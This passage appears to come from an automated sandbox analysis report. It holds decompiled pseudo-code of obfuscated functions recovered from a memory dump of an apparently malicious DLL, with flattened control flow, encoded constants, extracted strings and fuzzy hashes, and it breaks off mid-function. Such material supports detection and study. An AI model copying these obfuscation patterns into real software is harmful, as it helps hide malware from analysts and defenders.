				void* _t285;
				unsigned int* _t286;

				_t244 = __ecx;
				_t286 =  &_v216;
				_v168 = __ecx;
				_v176 = 0x487407;
				_v176 = _v176 >> 0xc;
				_v176 = _v176 >> 0xe;
				_v176 = _v176 ^ 0x000c50bb;
				_v196 = 0x2aa595;
				_t273 = 0x6d;
				_v196 = _v196 / _t273;
				_v196 = _v196 ^ 0x6673933a;
				_t281 = 0x2165af1;
				_t274 = 0x7e;
				_v196 = _v196 / _t274;
				_v196 = _v196 ^ 0x00dde39d;
				_v160 = 0x68aaca;
				_v160 = _v160 + 0xffffd52e;
				_v160 = _v160 >> 0xc;
				_v160 = _v160 ^ 0x0004f600;
				_v204 = 0x5c69b;
				_v204 = _v204 ^ 0xd424e8ff;
				_t275 = 0x65;
				_v204 = _v204 / _t275;
				_v204 = _v204 | 0x5118f678;
				_v204 = _v204 ^ 0x5314ae61;
				_v172 = 0x4290c0;
				_v172 = _v172 >> 2;
				_v172 = _v172 << 0xd;
				_v172 = _v172 ^ 0x14836fcd;
				_v180 = 0x59b41e;
				_t276 = 0x68;
				_v180 = _v180 / _t276;
				_v180 = _v180 + 0x7569;
				_v180 = _v180 ^ 0x000cb7b5;
				_v188 = 0x76f252;
				_v188 = _v188 | 0xf167eb40;
				_v188 = _v188 >> 9;
				_v188 = _v188 ^ 0x0070b7a7;
				_v200 = 0xf98b4b;
				_v200 = _v200 * 0x48;
				_v200 = _v200 | 0x3d9b8459;
				_v200 = _v200 ^ 0x63e554d6;
				_v200 = _v200 ^ 0x1c5b0657;
				_v208 = 0x9a1f07;
				_v208 = _v208 >> 0x10;
				_v208 = _v208 + 0xffff758d;
				_v208 = _v208 + 0x2b15;
				_v208 = _v208 ^ 0xfffa51cd;
				_v216 = 0xc7536;
				_v216 = _v216 ^ 0x16a638be;
				_v216 = _v216 * 0x56;
				_v216 = _v216 >> 0xa;
				_v216 = _v216 ^ 0x002ef2d7;
				_v136 = 0xd6c6ed;
				_v136 = _v136 >> 0xa;
				_v136 = _v136 ^ 0x0009db88;
				_v156 = 0x5fc950;
				_v156 = _v156 >> 4;
				_v156 = _v156 ^ 0x3470bdfe;
				_v156 = _v156 ^ 0x34716180;
				_v184 = 0xaf1a38;
				_v184 = _v184 ^ 0x59114742;
				_v184 = _v184 + 0xffff29af;
				_v184 = _v184 ^ 0x59b24491;
				_v152 = 0x1f2960;
				_t277 = 0x37;
				_v152 = _v152 / _t277;
				_v152 = _v152 ^ 0x00035bb4;
				_v140 = 0xb2feed;
				_v140 = _v140 << 4;
				_v140 = _v140 ^ 0x0b29c5a9;
				_v212 = 0xb28d5;
				_v212 = _v212 + 0xffffd266;
				_v212 = _v212 << 2;
				_v212 = _v212 + 0x458d;
				_v212 = _v212 ^ 0x002364ef;
				_v132 = 0x71f9e5;
				_v132 = _v132 + 0xffff0412;
				_v132 = _v132 ^ 0x007edd78;
				_v164 = 0x5a5a7b;
				_t146 =  &_v164; // 0x5a5a7b
				_t278 = 0x77;
				_v164 =  *_t146 / _t278;
				_t152 =  &_v164; // 0x5a5a7b
				_t279 = 0x14;
				_t243 = _v168;
				_v164 =  *_t152 * 0xc;
				_v164 = _v164 ^ 0x000c4983;
				_v192 = 0x7bb88e;
				_v192 = _v192 >> 6;
				_v192 = _v192 >> 4;
				_t280 = _v168;
				_v192 = _v192 / _t279;
				_v192 = _v192 ^ 0x00069fa7;
				_v144 = 0x46a6a8;
				_v144 = _v144 << 4;
				_v144 = _v144 ^ 0x04622bac;
				_v148 = 0x255e30;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x00187ce6;
				while(1) {
					L1:
					_t225 = 0xe19ffe2;
					do {
						while(_t281 != 0x2165af1) {
							if(_t281 == 0x40b230a) {
								_t280 = E10013B36(_v172, _v180,  *((intOrPtr*)(_t244 + 4)),  *_t244);
								if(_t280 != 0) {
									_t281 = 0x6035055;
									goto L9;
								}
							} else {
								if(_t281 == 0x6035055) {
									_t285 = 0x4000;
									_push(_t244);
									_t232 = E100134E7(_t244, 0x4000);
									_t244 = _v168;
									_t243 = _t232;
									_t286 =  &(_t286[3]);
									_t225 = 0xe19ffe2;
									_t281 =  !=  ? 0xe19ffe2 : 0xacf7530;
									continue;
								} else {
									if(_t281 == 0x6b4658b) {
										_t285 = E10017E33(0x10, 1);
										_push(0xb);
										_push(_t285);
										_push(_v204);
										E10010204(_v160,  &_v128);
										_t286 =  &(_t286[5]);
										_t281 = 0x40b230a;
										goto L9;
									} else {
										if(_t281 == 0xacf7530) {
											E100088FC(_v164, _v192, _v144, _v148, _t280);
										} else {
											if(_t281 != _t225) {
												goto L15;
											} else {
												_push(_v152);
												_push(_v184);
												_push(_v156);
												_t238 = E1000416C(_v136, 0x10001564);
												_push(_t280);
												_push( &_v128);
												_push(_t238);
												_push(_t285);
												_push(_t243);
												 *((intOrPtr*)(E1002272A(0xbb443524, 0x9a)))();
												E1000B952(_v140, _t238, _v212, _v132);
												_t286 =  &(_t286[0xa]);
												_t281 = 0xacf7530;
												L9:
												_t244 = _v168;
												goto L1;
											}
										}
									}
								}
							}
							L18:
							return _t243;
						}
						_t281 = 0x6b4658b;
						L15:
					} while (_t281 != 0x82d1738);
					goto L18;
				}
			}

0x10001ee2
0x10001ee2
0x10001eec
0x10001ef0
0x10001efa
0x10001eff
0x10001f04
0x10001f0c
0x10001f1a
0x10001f1f
0x10001f25
0x10001f2d
0x10001f36
0x10001f3b
0x10001f41
0x10001f49
0x10001f51
0x10001f59
0x10001f5e
0x10001f66
0x10001f6e
0x10001f7a
0x10001f7f
0x10001f85
0x10001f8d
0x10001f95
0x10001f9d
0x10001fa2
0x10001fa7
0x10001faf
0x10001fbb
0x10001fbe
0x10001fc2
0x10001fca
0x10001fd2
0x10001fda
0x10001fe2
0x10001fe7
0x10001fef
0x10001ffc
0x10002000
0x10002008
0x10002010
0x10002018
0x10002020
0x10002025
0x1000202d
0x10002035
0x1000203d
0x10002045
0x10002052
0x10002056
0x1000205b
0x10002063
0x1000206b
0x10002070
0x10002078
0x10002080
0x10002085
0x1000208d
0x10002095
0x1000209d
0x100020a7
0x100020af
0x100020b7
0x100020c5
0x100020ca
0x100020d0
0x100020d8
0x100020e0
0x100020e5
0x100020ed
0x100020f5
0x100020fd
0x10002102
0x1000210a
0x10002112
0x1000211a
0x10002122
0x1000212a
0x10002132
0x10002136
0x1000213b
0x10002141
0x10002146
0x1000214b
0x1000214f
0x10002153
0x1000215b
0x10002163
0x10002168
0x10002173
0x10002177
0x1000217b
0x10002183
0x1000218b
0x10002190
0x10002198
0x100021a0
0x100021a4
0x100021ac
0x100021ac
0x100021ac
0x100021b1
0x100021b1
0x100021c3
0x100022cc
0x100022d2
0x100022d4
0x00000000
0x100022d4
0x100021c9
0x100021cf
0x10002284
0x10002295
0x10002298
0x1000229d
0x100022a1
0x100022a3
0x100022ad
0x100022b2
0x00000000
0x100021d5
0x100021db
0x10002260
0x10002266
0x10002268
0x10002269
0x10002271
0x10002276
0x10002279
0x00000000
0x100021dd
0x100021e3
0x10002302
0x100021e9
0x100021eb
0x00000000
0x100021f1
0x100021f1
0x100021fa
0x100021fe
0x10002206
0x10002219
0x1000221a
0x1000221b
0x1000221c
0x1000221d
0x10002229
0x10002239
0x1000223e
0x10002241
0x10002246
0x10002246
0x00000000
0x10002246
0x100021eb
0x100021e3
0x100021db
0x100021cf
0x1000230d
0x10002316
0x10002316
0x100022de
0x100022e3
0x100022e3
0x00000000
0x100022ef

Strings

0^%, xrefs: 10002198
d#, xrefs: 10002289
iu, xrefs: 10001FC2
{ZZ, xrefs: 10002132

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: 0^%$iu${ZZ$d#
API String ID: 0-337391914
Opcode ID: 3bdff2d579cce83f26de9987ca1111b4c781b6edd25ba2c4a50933f77c27966b
Instruction ID: cdd2789d5873d85d26d71f9f5bc05796c40e56fa76fcd7857a9d7cc8b94ae4c7
Opcode Fuzzy Hash: 3bdff2d579cce83f26de9987ca1111b4c781b6edd25ba2c4a50933f77c27966b
Instruction Fuzzy Hash: 5AB155715083809BD354CF65C88A80FFBE2FBC5798F504A2DF99596260D3B5D949CB83

Uniqueness

Uniqueness Score: -1.00%

Function 10020C0C, Relevance: 5.2, Strings: 4, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10020C0C(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _t226;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				void* _t271;
				void* _t272;
				signed int* _t275;

				_t275 =  &_v1660;
				_v1640 = 0xc3d33d;
				_t271 = __ecx;
				_t272 = 0x296d301;
				_t241 = 0x34;
				_v1640 = _v1640 / _t241;
				_v1640 = _v1640 << 0xf;
				_v1640 = _v1640 ^ 0xe20e740c;
				_v1656 = 0xf6061e;
				_v1656 = _v1656 + 0xffff789f;
				_v1656 = _v1656 | 0x4fff069b;
				_v1656 = _v1656 >> 7;
				_v1656 = _v1656 ^ 0x00915869;
				_v1620 = 0xf83fda;
				_v1620 = _v1620 << 4;
				_t242 = 0x31;
				_v1620 = _v1620 / _t242;
				_v1620 = _v1620 ^ 0x0051706f;
				_v1604 = 0xdc332;
				_v1604 = _v1604 | 0x435fd104;
				_v1604 = _v1604 ^ 0x435abfa9;
				_v1636 = 0x429c29;
				_v1636 = _v1636 | 0xc79d892a;
				_t243 = 0x2f;
				_v1636 = _v1636 * 0x6c;
				_v1636 = _v1636 ^ 0x52550b6b;
				_v1628 = 0x5bf5ed;
				_v1628 = _v1628 + 0x38e4;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x170159d2;
				_v1632 = 0x80c6a;
				_v1632 = _v1632 + 0xffff476c;
				_v1632 = _v1632 + 0x55f8;
				_v1632 = _v1632 ^ 0x000c059c;
				_v1596 = 0xa13592;
				_v1596 = _v1596 ^ 0x993f6041;
				_v1596 = _v1596 ^ 0x9991c2a9;
				_v1568 = 0x708c8c;
				_v1568 = _v1568 | 0x76e507b8;
				_v1568 = _v1568 ^ 0x76f0e8c0;
				_v1612 = 0xbd3648;
				_v1612 = _v1612 / _t243;
				_v1612 = _v1612 ^ 0x0003af10;
				_v1564 = 0xbdf667;
				_v1564 = _v1564 << 5;
				_v1564 = _v1564 ^ 0x17b8da44;
				_v1588 = 0x2c9f44;
				_v1588 = _v1588 >> 9;
				_v1588 = _v1588 ^ 0x000561cc;
				_v1648 = 0xf67f2e;
				_t244 = 0xf;
				_v1648 = _v1648 / _t244;
				_v1648 = _v1648 >> 0x10;
				_v1648 = _v1648 >> 8;
				_v1648 = _v1648 ^ 0x000a1554;
				_v1572 = 0x5eb5c9;
				_v1572 = _v1572 ^ 0x1b436cc7;
				_v1572 = _v1572 ^ 0x1b160aec;
				_v1660 = 0x867eac;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x841b805b;
				_v1660 = _v1660 ^ 0x9235d12e;
				_v1660 = _v1660 ^ 0x0fd19308;
				_v1624 = 0xb133c6;
				_t245 = 0x56;
				_v1624 = _v1624 * 0x1f;
				_v1624 = _v1624 | 0x322232bd;
				_v1624 = _v1624 ^ 0x377ba81f;
				_v1580 = 0x904209;
				_v1580 = _v1580 + 0xa4e7;
				_v1580 = _v1580 ^ 0x0093b68f;
				_v1600 = 0x7c275a;
				_v1600 = _v1600 + 0xffff2912;
				_v1600 = _v1600 ^ 0x0078c930;
				_v1608 = 0xb35336;
				_v1608 = _v1608 * 0x56;
				_v1608 = _v1608 ^ 0x3c3039b2;
				_v1644 = 0x9a2872;
				_v1644 = _v1644 << 0xc;
				_v1644 = _v1644 << 4;
				_v1644 = _v1644 / _t245;
				_v1644 = _v1644 ^ 0x00762082;
				_v1652 = 0x38dbe9;
				_v1652 = _v1652 >> 6;
				_v1652 = _v1652 + 0x2a65;
				_v1652 = _v1652 + 0x6c91;
				_v1652 = _v1652 ^ 0x000907bc;
				_v1576 = 0xaac3f6;
				_v1576 = _v1576 >> 9;
				_v1576 = _v1576 ^ 0x00043b6f;
				_v1616 = 0xbb90eb;
				_v1616 = _v1616 ^ 0xabc6b8fd;
				_t226 = _v1616 * 0x79;
				_v1616 = _t226;
				_v1616 = _v1616 ^ 0x0e2e08c6;
				_v1584 = 0x2cc369;
				_v1584 = _v1584 >> 0xf;
				_v1584 = _v1584 ^ 0x0001ad1e;
				_v1592 = 0xa8009e;
				_v1592 = _v1592 + 0x8f89;
				_v1592 = _v1592 ^ 0x00a06e81;
				do {
					while(_t272 != 0x296d301) {
						if(_t272 != 0x51a502c) {
							if(_t272 == 0x657ab98) {
								_push(_v1592);
								_push(0);
								_push(_t245);
								_push( &_v1040);
								_push(_v1584);
								_push(_v1616);
								_push(_v1576);
								return E1000D1FD(0, 0, 0);
							}
							goto L9;
						}
						E1001E780(_v1640, __eflags, _v1656,  &_v1560);
						 *((short*)(E10001A5C( &_v1560, _v1620, _v1604))) = 0;
						E1001215E(_v1636, _v1628, __eflags,  &_v520);
						_push(_v1612);
						_push(_v1568);
						_push(_v1596);
						E100049CE( &_v1560,  &_v520, E1000416C(_v1632, 0x100016b4), _v1564, _v1588, _v1632, _v1648, _v1572);
						E1000B952(_v1660, _t232, _v1624, _v1580);
						_t245 = _v1600;
						_t226 = E1001C962(_t245, _v1608, _t271, _v1644, _v1652,  &_v1040);
						_t275 =  &(_t275[0x14]);
						__eflags = _t226;
						if(__eflags != 0) {
							_t272 = 0x657ab98;
							continue;
						}
						return _t226;
					}
					_t272 = 0x51a502c;
					L9:
					__eflags = _t272 - 0x564a993;
				} while (__eflags != 0);
				return _t226;
			}

0x10020c0c
0x10020c12
0x10020c26
0x10020c28
0x10020c2d
0x10020c32
0x10020c38
0x10020c3d
0x10020c45
0x10020c4d
0x10020c55
0x10020c5d
0x10020c62
0x10020c6a
0x10020c72
0x10020c7b
0x10020c80
0x10020c86
0x10020c8e
0x10020c96
0x10020c9e
0x10020ca6
0x10020cae
0x10020cbb
0x10020cbe
0x10020cc2
0x10020cca
0x10020cd2
0x10020cda
0x10020cdf
0x10020ce7
0x10020cef
0x10020cf7
0x10020cff
0x10020d07
0x10020d0f
0x10020d17
0x10020d1f
0x10020d27
0x10020d2f
0x10020d37
0x10020d47
0x10020d4b
0x10020d53
0x10020d5b
0x10020d60
0x10020d68
0x10020d70
0x10020d75
0x10020d7d
0x10020d89
0x10020d8c
0x10020d90
0x10020d95
0x10020d9a
0x10020da2
0x10020daa
0x10020db2
0x10020dba
0x10020dc2
0x10020dc7
0x10020dcf
0x10020dd9
0x10020de6
0x10020dfa
0x10020dfb
0x10020dff
0x10020e07
0x10020e0f
0x10020e17
0x10020e1f
0x10020e27
0x10020e2f
0x10020e37
0x10020e3f
0x10020e4c
0x10020e50
0x10020e58
0x10020e60
0x10020e65
0x10020e70
0x10020e74
0x10020e7c
0x10020e84
0x10020e89
0x10020e91
0x10020e99
0x10020ea1
0x10020ea9
0x10020eae
0x10020eb6
0x10020ebe
0x10020ec6
0x10020ecb
0x10020ecf
0x10020ed7
0x10020edf
0x10020ee4
0x10020eec
0x10020ef4
0x10020efc
0x10020f04
0x10020f04
0x10020f12
0x10020f16
0x10020f1c
0x10020f29
0x10020f2b
0x10020f2c
0x10020f2d
0x10020f33
0x10020f37
0x00000000
0x10020f40
0x00000000
0x10020f16
0x10020f5b
0x10020f7a
0x10020f89
0x10020f8e
0x10020f97
0x10020f9e
0x10020fd8
0x10020feb
0x10021004
0x10021009
0x1002100e
0x10021011
0x10021013
0x10021019
0x00000000
0x10021019
0x10020f4d
0x10020f4d
0x10021020
0x10021022
0x10021022
0x10021022
0x00000000

Strings

e*, xrefs: 10020E89
Z'|, xrefs: 10020E27
opQ, xrefs: 10020C86
8, xrefs: 10020CD2

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: Z'|$e*$opQ$8
API String ID: 0-607364973
Opcode ID: 7737982964efa5e65e09db2bd450b463daff9f1674638ed2fce2a90255653332
Instruction ID: 145b2d47507cd9d7ec6489a36fd44f3a34fcb9d99d0686e736fcedadba9bef77
Opcode Fuzzy Hash: 7737982964efa5e65e09db2bd450b463daff9f1674638ed2fce2a90255653332
Instruction Fuzzy Hash: 11A11F715093809FC3A9CF61D58984BBBF2FBC4748F50891DF1A586261D7B68909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10001B70, Relevance: 5.2, Strings: 4, Instructions: 188
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10001B70(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				void* _t190;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				void* _t217;
				void* _t218;
				signed int* _t221;
				signed int* _t222;

				_t221 =  &_v72;
				_v48 = 0xb7f87d;
				_v48 = _v48 * 0x64;
				_t217 = __edx;
				_v48 = _v48 | 0x54ef42e5;
				_v48 = _v48 ^ 0x57f0fed0;
				_t190 = __ecx;
				_v28 = 0x8147e1;
				_t218 = 0xf2ac8d1;
				_t192 = 3;
				_v28 = _v28 * 0x5d;
				_v28 = _v28 ^ 0x2effe386;
				_v72 = 0x2418fb;
				_v72 = _v72 ^ 0x366f8350;
				_v72 = _v72 + 0xffff517e;
				_v72 = _v72 + 0x2fb0;
				_v72 = _v72 ^ 0x3649ca66;
				_v24 = 0x8211fc;
				_v24 = _v24 / _t192;
				_v24 = _v24 ^ 0x00254129;
				_v44 = 0xd43174;
				_v44 = _v44 + 0xffff9ad5;
				_v44 = _v44 | 0x68863e10;
				_v44 = _v44 ^ 0x68d05ea4;
				_v68 = 0x5e4854;
				_v68 = _v68 + 0xffff7f2e;
				_t193 = 0x46;
				_v68 = _v68 / _t193;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x1569d162;
				_v64 = 0x3c0f65;
				_t194 = 0x66;
				_v64 = _v64 * 0x14;
				_v64 = _v64 * 7;
				_v64 = _v64 * 0x29;
				_v64 = _v64 ^ 0x42a6a51b;
				_v16 = 0x5b9b2f;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x05ba0f56;
				_v20 = 0x948d14;
				_v20 = _v20 / _t194;
				_v20 = _v20 ^ 0x000aea21;
				_v12 = 0x64f9;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x0006829f;
				_v60 = 0xcd8f5a;
				_v60 = _v60 | 0x32dace6b;
				_v60 = _v60 + 0xaf8f;
				_v60 = _v60 ^ 0xbeff154e;
				_v60 = _v60 ^ 0x8c17721a;
				_v40 = 0xd55ab2;
				_v40 = _v40 << 3;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0xaaba61a9;
				_v32 = 0x4a0944;
				_v32 = _v32 | 0xca416a9d;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0x5b533b25;
				_v8 = 0xd1d9ab;
				_v8 = _v8 ^ 0xe8b2e4b9;
				_v8 = _v8 ^ 0xe860c42d;
				_v36 = 0x7d0d1c;
				_v36 = _v36 >> 2;
				_v36 = _v36 + 0xffffc998;
				_v36 = _v36 ^ 0x001f3326;
				_v56 = 0xb63818;
				_v56 = _v56 + 0xcae9;
				_v56 = _v56 | 0xf0a684b0;
				_v56 = _v56 ^ 0x4be31090;
				_v56 = _v56 ^ 0xbb51b727;
				_v52 = 0x95d800;
				_t195 = 0x60;
				_v52 = _v52 / _t195;
				_t196 = 0x27;
				_v52 = _v52 / _t196;
				_v52 = _v52 ^ 0xea928429;
				_v52 = _v52 ^ 0xea9690d3;
				_v4 = 0x46d8ba;
				_v4 = _v4 + 0xffffa9b7;
				_v4 = _v4 ^ 0x00496f7f;
				while(1) {
					L1:
					_t184 = 0xe3079c;
					do {
						while(_t218 != _t184) {
							if(_t218 == 0x251d3e4) {
								_t196 = _v12;
								_t186 = E1001B6BF(_v12,  *((intOrPtr*)(_t217 + 0x14)), _v60, _v40);
								_t221 =  &(_t221[2]);
								 *((intOrPtr*)(_t217 + 0x10)) = _t186;
								__eflags = _t186;
								_t184 = 0xe3079c;
								_t218 =  !=  ? 0xe3079c : 0x7e4fbc9;
								continue;
							} else {
								if(_t218 == 0x7e4fbc9) {
									return E1001E820(_v52,  *((intOrPtr*)(_t217 + 0x14)), _v4);
								}
								if(_t218 == 0xf2ac8d1) {
									_t218 = 0xf84b738;
									continue;
								} else {
									_t228 = _t218 - 0xf84b738;
									if(_t218 != 0xf84b738) {
										goto L13;
									} else {
										_t146 =  &_v28; // 0xaea21
										_t185 = E1001058C(_v48, _t228,  *_t146, _t190, _v72);
										_t222 =  &(_t221[3]);
										 *((intOrPtr*)(_t217 + 0x14)) = _t185;
										if(_t185 != 0) {
											E10017E6C(_t185, _t185, _v24, _v44, _v68);
											_t196 = _v64;
											E10005651(_v16,  *((intOrPtr*)(_t217 + 0x14)), _v20);
											_t221 =  &(_t222[5]);
											_t218 = 0x251d3e4;
											goto L1;
										}
									}
								}
							}
							L16:
							return _t185;
						}
						_t185 = E10009B9F(_v32, _t196, _v8, E100203FD, _t196, _v36, _v56, _t196, _t217);
						_t221 =  &(_t221[8]);
						 *((intOrPtr*)(_t217 + 0x1c)) = _t185;
						__eflags = _t185;
						if(_t185 == 0) {
							_t218 = 0x7e4fbc9;
							_t184 = 0xe3079c;
							goto L13;
						}
						goto L16;
						L13:
						__eflags = _t218 - 0x7ce810b;
					} while (__eflags != 0);
					return _t184;
				}
			}

0x10001b70
0x10001b73
0x10001b84
0x10001b88
0x10001b8a
0x10001b94
0x10001b9c
0x10001b9e
0x10001ba6
0x10001bb2
0x10001bb5
0x10001bb9
0x10001bc1
0x10001bc9
0x10001bd1
0x10001bd9
0x10001be1
0x10001be9
0x10001bf9
0x10001bfd
0x10001c05
0x10001c0d
0x10001c15
0x10001c1d
0x10001c25
0x10001c2d
0x10001c39
0x10001c3e
0x10001c44
0x10001c49
0x10001c51
0x10001c5e
0x10001c5f
0x10001c68
0x10001c71
0x10001c75
0x10001c7d
0x10001c85
0x10001c8a
0x10001c92
0x10001ca0
0x10001ca4
0x10001cac
0x10001cb4
0x10001cb9
0x10001cc1
0x10001cc9
0x10001cd1
0x10001cd9
0x10001ce1
0x10001ce9
0x10001cf1
0x10001cf6
0x10001cfb
0x10001d03
0x10001d0b
0x10001d13
0x10001d18
0x10001d20
0x10001d28
0x10001d30
0x10001d38
0x10001d42
0x10001d4c
0x10001d54
0x10001d5c
0x10001d64
0x10001d6c
0x10001d74
0x10001d7c
0x10001d84
0x10001d92
0x10001d97
0x10001da1
0x10001da4
0x10001da8
0x10001db0
0x10001db8
0x10001dc0
0x10001dc8
0x10001dd0
0x10001dd0
0x10001dd0
0x10001dd5
0x10001dd5
0x10001de3
0x10001e6c
0x10001e70
0x10001e75
0x10001e78
0x10001e7b
0x10001e7f
0x10001e84
0x00000000
0x10001de5
0x10001de7
0x00000000
0x10001ed9
0x10001df3
0x10001e57
0x00000000
0x10001df5
0x10001df5
0x10001dfb
0x00000000
0x10001e01
0x10001e06
0x10001e0e
0x10001e13
0x10001e16
0x10001e1b
0x10001e31
0x10001e41
0x10001e45
0x10001e4a
0x10001e4d
0x00000000
0x10001e4d
0x10001e1b
0x10001dfb
0x10001df3
0x10001ee1
0x10001ee1
0x10001ee1
0x10001ea5
0x10001eaa
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb6
0x00000000
0x10001eb6
0x00000000
0x10001ebb
0x10001ebb
0x10001ebb
0x00000000
0x10001dd5

Strings

BT, xrefs: 10001B8A
%;S[, xrefs: 10001D18
!, xrefs: 10001E06
TH^, xrefs: 10001C25

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: !$%;S[$TH^$BT
API String ID: 0-1061845879
Opcode ID: cef2c62b7ad2e422c1f2637c02435888b7a555220d410917700fcefe261acc69
Instruction ID: aead4c5c6c8eed437cc18a848f5bdfc5d2455af10178835979849bd961db152a
Opcode Fuzzy Hash: cef2c62b7ad2e422c1f2637c02435888b7a555220d410917700fcefe261acc69
Instruction Fuzzy Hash: 089143729083429BD358CF25D98A40BFBF1FBD5794F005A1DF98596260D3B1DA588B83

Uniqueness

Uniqueness Score: -1.00%

Function 1001A288, Relevance: 5.2, Strings: 4, Instructions: 183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E1001A288(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t163;
				void* _t185;
				intOrPtr* _t186;
				void* _t188;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				void* _t205;
				signed int* _t208;

				_t186 = _a12;
				_push(_a16);
				_push(_t186);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t163);
				_v16 = 0xb858ea;
				_t208 =  &(( &_v92)[6]);
				asm("stosd");
				_t205 = 0;
				_t188 = 0x9581ea7;
				_push("true");
				asm("stosd");
				asm("stosd");
				_v44 = 0x10fbdf;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 ^ 0x00000042;
				_v52 = 0xa8ec40;
				_v52 = _v52 >> 2;
				_v52 = _v52 + 0x9cde;
				_v52 = _v52 ^ 0x002ad7ef;
				_v32 = 0x7dbb43;
				_v32 = _v32 + 0xffff4c2f;
				_v32 = _v32 ^ 0x00701d43;
				_v68 = 0x8b950;
				_v68 = _v68 ^ 0x7babb2d5;
				_v68 = _v68 ^ 0x3e8b23ac;
				_v68 = _v68 ^ 0x452b0fd2;
				_v36 = 0x45fc6a;
				_v36 = _v36 >> 0x10;
				_v36 = _v36 ^ 0x0005aa1e;
				_v40 = 0x1e46dd;
				_pop(_t201);
				_v40 = _v40 * 0x4b;
				_v40 = _v40 ^ 0x08de67f5;
				_v72 = 0x864630;
				_v72 = _v72 | 0x75814275;
				_v72 = _v72 + 0xffff20c5;
				_v72 = _v72 ^ 0x75899d43;
				_v92 = 0xc7262f;
				_v92 = _v92 + 0x2ae5;
				_v92 = _v92 | 0xbb83f17e;
				_v92 = _v92 >> 6;
				_v92 = _v92 ^ 0x02eaab2e;
				_v60 = 0xd70db1;
				_v60 = _v60 << 0xb;
				_v60 = _v60 + 0x5a5a;
				_v60 = _v60 ^ 0xb869d9c6;
				_v84 = 0xed3a94;
				_v84 = _v84 * 0x4d;
				_v84 = _v84 | 0xfc9bcdb4;
				_v84 = _v84 ^ 0xffdab713;
				_v88 = 0x5dd933;
				_v88 = _v88 / _t201;
				_v88 = _v88 + 0xdff2;
				_v88 = _v88 << 0xa;
				_v88 = _v88 ^ 0x0695f469;
				_v64 = 0xa71536;
				_v64 = _v64 ^ 0x855d651d;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0x17e6b956;
				_v76 = 0xbe68a4;
				_v76 = _v76 + 0xed22;
				_v76 = _v76 + 0xfffff10b;
				_v76 = _v76 + 0xffff189b;
				_v76 = _v76 ^ 0x00bde679;
				_v80 = 0x6b06a8;
				_t202 = 0x77;
				_v80 = _v80 / _t202;
				_v80 = _v80 | 0xa9bbffef;
				_v80 = _v80 ^ 0xa9b07882;
				_v48 = 0xa015c8;
				_t203 = 0x72;
				_v48 = _v48 / _t203;
				_v48 = _v48 + 0x16f9;
				_v48 = _v48 ^ 0x00008b0f;
				_v24 = 0xcc0612;
				_v24 = _v24 | 0xaf7b49e5;
				_v24 = _v24 ^ 0xafff2183;
				_v28 = 0xbb92b2;
				_v28 = _v28 * 0x32;
				_v28 = _v28 ^ 0x24afa157;
				_v56 = 0x34e82;
				_v56 = _v56 + 0xde45;
				_v56 = _v56 | 0xb9cfad38;
				_v56 = _v56 ^ 0xb9cf18ee;
				while(_t188 != 0x15c2127) {
					if(_t188 == 0x9581ea7) {
						_t188 = 0xf58e585;
						continue;
					} else {
						if(_t188 == 0xee9f453) {
							_push(_t188);
							_t205 = E100134E7(_t188, _v20);
							_t208 =  &(_t208[3]);
							if(_t205 != 0) {
								_t188 = 0x15c2127;
								continue;
							}
						} else {
							if(_t188 != 0xf58e585) {
								L11:
								if(_t188 != 0x355e3c8) {
									continue;
								}
							} else {
								_t185 = E100175CD(_v32, 0, _v68,  &_v20, _v36, _t188, _t188, _a16, _v40, _v44, _t188, _v72, _v92);
								_t208 =  &(_t208[0xb]);
								if(_t185 != 0) {
									_t188 = 0xee9f453;
									continue;
								}
